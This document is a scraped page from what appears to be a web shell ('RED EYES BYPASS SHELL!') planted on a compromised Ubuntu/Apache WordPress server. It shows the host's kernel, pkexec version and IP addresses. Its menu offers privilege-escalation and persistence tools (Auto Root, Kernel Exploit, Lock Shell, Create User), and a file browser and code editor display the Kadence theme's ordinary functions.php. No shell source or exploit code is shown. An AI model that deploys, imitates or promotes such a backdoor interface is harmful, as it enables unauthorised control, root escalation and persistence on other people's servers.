Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
kadence /
inc /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
components
[ DIR ]
drwxr-xr-x
customizer
[ DIR ]
drwxr-xr-x
dashboard
[ DIR ]
drwxr-xr-x
meta
[ DIR ]
drwxr-xr-x
template-functions
[ DIR ]
drwxr-xr-x
back-compat.php
2.87
KB
-rwxr-xr-x
class-kadence-css.php
46.64
KB
-rwxr-xr-x
class-local-gfonts.php
19.61
KB
-rwxr-xr-x
class-theme.php
9.18
KB
-rwxr-xr-x
functions.php
1.56
KB
-rwxr-xr-x
template-hooks.php
6.76
KB
-rwxr-xr-x
wordpress-shims.php
519
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php /** * The `kadence()` function. * * @package kadence */ namespace Kadence; use Kadence\Template_Tags; use Kadence\Theme; use function get_template_directory; /** * Provides access to all available template tags of the theme. * * When called for the first time, the function will initialize the theme. * * @return Template_Tags Template tags instance exposing template tag methods. */ function kadence() : Template_Tags { static $theme = null; if ( null === $theme ) { $theme = Theme::instance(); } return $theme->template_tags(); } // Load the CSS class. require get_template_directory() . '/inc/class-kadence-css.php'; // Load the Local Font class. require get_template_directory() . '/inc/class-local-gfonts.php'; // Load the Customizer class. require get_template_directory() . '/inc/customizer/class-theme-customizer.php'; // Load Settings Page Class. require get_template_directory() . '/inc/dashboard/class-theme-dashboard.php'; // Load the Meta class. require get_template_directory() . '/inc/meta/class-theme-meta.php'; // Load the template functions. require get_template_directory() . '/inc/template-functions/header-functions.php'; require get_template_directory() . '/inc/template-functions/title-functions.php'; require get_template_directory() . '/inc/template-functions/single-functions.php'; require get_template_directory() . '/inc/template-functions/footer-functions.php'; require get_template_directory() . '/inc/template-functions/archive-functions.php'; // Load the template hooks. require get_template_directory() . '/inc/template-hooks.php';
Close